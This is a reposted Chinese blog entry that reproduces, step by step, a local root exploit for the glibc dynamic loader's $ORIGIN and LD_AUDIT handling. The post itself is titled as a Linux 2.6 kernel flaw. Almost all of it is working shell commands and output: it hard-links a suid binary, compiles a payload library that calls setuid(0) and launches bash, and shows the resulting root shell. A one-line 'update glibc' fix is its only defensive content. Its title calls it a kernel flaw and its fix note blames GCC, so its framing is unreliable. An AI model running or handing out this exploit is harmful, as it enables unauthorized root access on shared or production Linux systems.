linux2.6核心本地提權

linux2.6核心本地提權

It is possible to exploit this flaw to execute arbitrary code as root.

Please note, this is a low impact vulnerability that is only of interest to

security professionals and system administrators. End users do not need

to be concerned.

Exploitation would look like the following.

# Create a directory in /tmp we can control.

$ mkdir /tmp/exploit

# Link to an suid binary, thus changing the definition of $ORIGIN.

$ ln /bin/ping /tmp/exploit/target

# Open a file descriptor to the target binary (note: some users are surprised

# to learn exec can be used to manipulate the redirections of the current

# shell if a command is not specified. This is what is happening below).

$ exec 3< /tmp/exploit/target

# This descriptor should now be accessible via /proc.

$ ls -l /proc/$$/fd/3

lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target*

# Remove the directory previously created

$ rm -rf /tmp/exploit/

# The /proc link should still exist, but now will be marked deleted.

lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted)

# Replace the directory with a payload DSO, thus making $ORIGIN a valid target to dlopen().

$ cat > payload.c

void __attribute__((constructor)) init()

{

    setuid(0);

    system("/bin/bash");

}

^D

$ gcc -w -fPIC -shared -o /tmp/exploit payload.c

$ ls -l /tmp/exploit

-rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit*

# Now force the link in /proc to load $ORIGIN via LD_AUDIT.

$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3

sh-4.1# whoami

root

sh-4.1# id

uid=0(root) gid=500(taviso)

 漏洞解決方法(這是由GCC引發的一個漏洞):

更新:glibc

本文轉自it你好 51CTO部落格，原文連結：http://blog.51cto.com/itnihao/757187，如需轉載請自行聯系原作者